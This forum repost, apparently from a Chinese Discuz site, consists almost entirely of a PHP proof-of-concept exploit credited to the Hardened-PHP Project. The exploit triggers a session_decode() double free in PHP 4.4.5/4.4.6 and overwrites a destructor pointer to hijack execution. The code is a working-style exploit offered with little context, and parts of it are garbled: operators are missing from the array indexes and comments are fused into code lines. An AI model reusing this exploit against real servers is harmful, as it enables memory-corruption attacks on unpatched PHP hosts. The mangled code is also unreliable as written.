• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

    发布者: 山止川行 | 发布时间: 2025-6-28 22:50| 查看数: 55| 评论数: 0|帖子模式

    <?php
      ////////////////////////////////////////////////////////////////////////
      //  _  _                _                     _       ___  _  _  ___  //
      // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
      // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
      // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
      //                                                                    //
      //         Proof of concept code from the Hardened-PHP Project        //
      //                   (C) Copyright 2007 Stefan Esser                  //
      //                                                                    //
      ////////////////////////////////////////////////////////////////////////
      //     PHP 4.4.5/4.4.6 session_decode() Double Free Vulnerability     //
      ////////////////////////////////////////////////////////////////////////   // This is meant as a protection against remote file inclusion.
      die("REMOVE THIS LINE");   ini_set("session.serialize_handler", "php");
      session_start();   $varname = str_repeat("D", 39);
      $$varname = &$_SESSION;   // Trigger the double free
       
      session_decode($varname.'|i:0;');
      $_________________x = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJ";
      $_________________a = array("OneElement");   // Now x and a point to the same memory. Therefore x can be used to modify a   // Overwrite pointer to the destructor   
      $_________________x[8*4 0] = chr(0x55);
      $_________________x[8*4 1] = chr(0x66);
      $_________________x[8*4 2] = chr(0x77);
      $_________________x[8*4 3] = chr(0x88);
       
      // Trigger the destruction
      unset($_________________a);
    ?>

    来源:https://www.jb51.net/hack/5696.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表